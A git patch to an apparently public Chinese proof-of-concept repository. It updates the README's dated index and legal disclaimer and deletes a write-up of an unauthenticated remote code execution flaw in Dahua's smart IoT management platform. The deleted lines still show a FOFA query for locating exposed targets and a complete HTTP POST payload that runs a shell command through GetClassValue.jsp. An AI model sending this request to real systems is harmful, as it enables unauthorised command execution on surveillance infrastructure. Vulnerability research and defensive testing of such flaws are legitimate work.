From 48cef42900ba5b4bcb0f208123a86ad2ad8f13cd Mon Sep 17 00:00:00 2001 From: wy876 Date: Tue, 7 Jan 2025 12:34:29 +0800 Subject: [PATCH] del --- README.md | 6 +++- ...综合管理平台GetClassValue.jsp远程代码执行漏洞.md | 28 ------------------- 2 files changed, 5 insertions(+), 29 deletions(-) delete mode 100644 大华/大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞.md diff --git a/README.md b/README.md index 92314d0..91e5be9 100644 --- a/README.md +++ b/README.md @@ -47,6 +47,10 @@ +## 2025.01.11 新增漏洞 + +- + ## 2025.01.04 新增漏洞 - [Guns后台任意文件上传漏洞](./Guns/Guns后台任意文件上传漏洞.md) @@ -1670,6 +1674,6 @@ ## 免责声明 -由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 +**本项目所涉及的POC仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读法律法规** [![](https://starchart.cc/wy876/POC.svg)](https://starchart.cc/wy876/POC) diff --git a/大华/大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞.md b/大华/大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞.md deleted file mode 100644 index 9c6a463..0000000 --- a/大华/大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞.md +++ /dev/null @@ -1,28 +0,0 @@ -# 大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞 - -大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞,攻击者可以不需要授权远程执行命令。 - -## fofa - -```javascript -app="dahua-智能物联综合管理平台" -``` - -## poc - -```javascript -POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1 -Host: -Content-Type: application/json -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - -{ - "data": { - "clazzName": "com.dahua.admin.util.RuntimeUtil", - "methodName": "syncexecReturnInputStream", - "fieldName": ["id"] - } -} -``` - -![image-20250102172533617](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501021725804.png) \ No newline at end of file